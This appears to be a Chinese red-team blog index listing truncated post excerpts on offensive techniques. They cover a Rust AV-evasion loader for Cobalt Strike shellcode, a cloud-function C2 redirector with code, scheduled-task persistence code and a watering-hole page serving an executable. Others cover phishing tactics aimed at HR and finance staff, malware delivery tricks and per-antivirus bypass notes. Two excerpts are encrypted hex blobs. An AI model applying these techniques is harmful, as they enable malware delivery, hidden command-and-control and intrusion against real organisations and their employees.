工具开发-Rustloader免杀生成器
Rustloader免杀生成器开发背景由于近年来go用来做免杀器越来越普遍,导致杀软对go编译程序静态查杀力度增大,因此转型投入rust的怀抱
说实话,rust的语法是真难懂,边改边查参考github代码总算是捏出来了
加载方式
使用LoadLibraryA和GetProcAddress从ntdll获取NtQueueApcThreadEx函数。
使用VirtualAlloc分配远程内存。
使用STD::PTR::COPY将SHELLCODE复制到分配的内存。
使用VirtualProtect将内存权限更改为可执行文件。
使用GetCurrentThread获取当前线程句柄。
使用NtQueueApcThreadEx执行SHELLCODE
使用方式和我之前开发的go千机一样,一样是一键化生成,别问,问就是为了最大化的简便,目录结构如下
解压打开文件目录,把 beacon_x64.bin 放置在当前目录下,点击 一键生成.bat
输出免杀文件在 output 文件夹下,随机六位数命名
捆绑文件选择捆绑文件存放在 bundle 文件夹下,默认放置打开损坏文档
如果不需要捆绑文件,把ma ...
溯源反制-简易蜜罐设计流程
简易蜜罐设计流程设计要点部署方式尽量简便,适配环境兼容性高,与客户实际网络环境单独隔离,防止作为跳板进行横向
水坑攻击
部署仿真系统系统攻击者进行攻击
仿真系统需提供接口供攻击队扫描识别漏洞
通过js水坑触发安全控件弹窗诱使攻击者安装
不安装则会重定向到首页
代码实现
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, send_from_directory, request, make_responseapp = Flask(__name__, static_folder='static')@app.route('/')def index(): return send_from_directory(app.static_folder, '1.html')@app.route('/test.exe')d ...
工具开发-go实现屏幕监控截图
开发背景今天好兄弟打项目时候碰到这么一个情况,目标机器访问内网应用需要连接VPN,会切断外网连接,导致beacon无法及时执行回显命令
为了证明能够突破隔离,需要目标机器访问内网应用的截图,于是简单写了下,当作记录
代码实现go build -trimpath -ldflags="-s -w -H windowsgui" main.go
为了避免后续beacon掉线导致进程一直执行,需要设置生成次数限制
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455package mainimport ( "fmt" "image/png" "os" "path/filepath" "time" "github.com/vova616/screenshot")func main() { //路径 s ...
钓鱼技巧-FTP高级LNK钓鱼技术
573c9136887dd3c10ac91ab197c13a96b784871495672aa585ffee31d6f40e013c53864c5823bcd71b7854b059b5710564c158aae16c011554207d7400c1120040828bd4c48457f924171f28f3e9badf31c0c9ec90f9e80610ee88e16dd4a50a235b1f1fa0378a3f639256df0d07d9c3438c3ae28f23791756489eedeb39a576173acce25893cdd702b732c21c49943146e0154069e7a260bf6d023d59a17b77c35c7deb4a4885c78c03c1772544628bd5cecdd48a467465a2257796587dd4b768fcad3c03db07e03a11a960b5085f9a56a580dd066e010098e998ea909c1206bb942303f670dbc4a64986e04981b34dfd13c77ba30bc7565 ...
红队技术-攻防场景下360对抗专题
cbd6f2c07a534cf88d3655f88e3f0065671c1e8f29ae7ff190de02afd711ca5cae147bb433f7779110a70e5dd31a1ce0ce9d5784827302c1ce9237a967ff9cff52acfaf9c668748a1f517ca01f1afd72814d958d3884685eea4696ea53d977c3c60f4bc1f6d5e1390b284a12d8a4cd503969c3f2522611afe3b2786375097ccf08f356c3af922b2e1c77b2b58bc1fc76af3a9c7a799d66b0e564017ba6def25ebc166ec322812262cf2a58b7c694b4157ba8487241b9363d19c025b32c957011f5aa0ce7f64d97cb64df4a9584cd9341af7234832e9ebdea8d6c194e74ecd3a5065bf871453387784377923f00ee08f6855af17a9f7896318 ...
红队技术-cobaltstrike流量隐藏
云函数新建一个云函数,在代码位置进行修改
首先导入 yisiwei.zip 的云函数包
12345678910111213141516171819# -*- coding: utf8 -*-import json, requests, base64def main_handler(event, context): C2 = 'https://49.xx.xx.xx' # 这里可以使用 HTTP、HTTPS~下角标~ path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event[ ...
红队技术-外网打点实战案例分享
红队外网打点实战案例分享从最基础的登录框突破登录框作为hw出现场次最多的角色,也是最容易出洞的,下面介绍一些自己常用的测试方法
登录爆破小技巧
像这种系统的爆破我们有两种解决方法:
分析前端加密算法,写脚本模拟对密码进行加密
固定密码为123456 000000 使用常见的用户名作为字典进行爆破
两种方法各有优劣,我更倾向于第二种,在比赛打点效率会更高,分析加密算法更适用于红队检测项目
使用爆破的账号密码登入后台,便可以继续寻找后台上传点
看到图片类型这里限制上传的文件格式
直接添加 aspx 文件格式类型
成功getshell
修改返回数据包参数进入后台有些时候网站登录状态是根据前端判断的,这时候我们就可以直接修改返回包进行绕过
前端判断登录逻辑根据返回包的ret值决定,当返回值为1则成功登录
成功进入后台
插件探测常见sql注入和log4j漏洞sql注入插件推荐 https://github.com/smxiazi/xia_sql
基本原理是通过发送多个数据包,根据返回数据长度判断是否存在注入
除了被动扫描以外,我们还可以通过手动添加单引号、双引号去查看返回包 ...
红队技术-钓鱼手法及木马免杀技巧
简述钓鱼是攻防对抗中一种常用的手段,攻击者通常伪装成可信任的实体,例如合法的机构、公司或个人,以引诱受害者揭示敏感信息或执行恶意操作,能快速地撕破目标的伤口进行深入利用,快速进内网进行刷分,投递木马同时需要考虑逃避杀毒软件检测,本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开
信息搜集大批量邮箱搜集大批量邮箱搜集可通过
https://app.snov.io/
http://www.skymem.info/
搜索引擎但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择私人邮箱或不被邮服拦截的邮箱
比如说 xx举报,xx招聘面对大众的邮箱,相关语法:
12345site:"xxx.com" 举报site:"xxx.com" 招聘xx公司举报 @126.comxx公司招聘 @qq.com
钓鱼手法社工钓鱼1、首先是目标选择,目标群体:hr、经理、财务 等安全意识薄弱的人优先选择,避开信息安全部
2、选择目标公司分部进行钓鱼成功率较高,前期提前想好话术和应变对策,避免被识破
2、社牛的师傅可以尝试电话钓鱼,获取信任再添加微信发送木 ...
红队技术-上线木马自动维权
在攻防中,上线机器总是需要手动进行维权,太过于麻烦,何不直接上线即维权呢,直接放核心代码,当做个记录
https://github.com/capnspacehook/taskmaster
12345678910111213141516171819202122232425262728293031323334353637383940package mainimport ( "os" "github.com/capnspacehook/taskmaster")func runWinTask(path string) { // 创建初始化计划任务 taskService, _ := taskmaster.Connect() defer taskService.Disconnect() // 定义新的计划任务 newTaskDef := taskService.NewTaskDefinition() // 添加执行程序的路径 newTaskDef.AddAction(taskmaster.ExecAction{ Path: path ...
红队技术-社工钓鱼细节技巧
社工钓鱼细节技巧钓鱼对象1、hr、经理、财务 等安全意识薄弱的人,避开信息安全部
如何搜集邮箱信息?
https://app.snov.io/
但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择一些针对公开群众的邮箱
比如说 xxx举报,xxx信息反馈面对大众的邮箱,如何搜集呢
钓鱼手法1、群发(不推荐,易被发现或被邮服拦截)
2、添加微信发送钓鱼木马(话术获取信任)
3、扫码活动钓账号
邮件投递木马1、木马需要打压缩,添加密码并隐藏内容,防止直接在压缩包内打开
2、后缀可选择其他非exe仍可执行的,如scr、com等
3、如果知道对方杀软没有360这种,可通过空格和长文件命名
免杀及捆绑文件自写工具介绍
杀软特性
杀软类型
免杀绕过技巧
火绒
编译参数限制多,对hash和字符串特征进行识别,静态能过动态基本不查杀,对很多go库调用报毒
360
单360查杀力不高,装了杀毒后直接儿子变爸爸,查杀力大大提升,对于简单的加密识别度较高,容易上线后云查杀过一会掉线,推荐使用分离加载方式,并使用反沙箱的代码延长马子时间,对资源查杀力度强,会报qvm
3 ...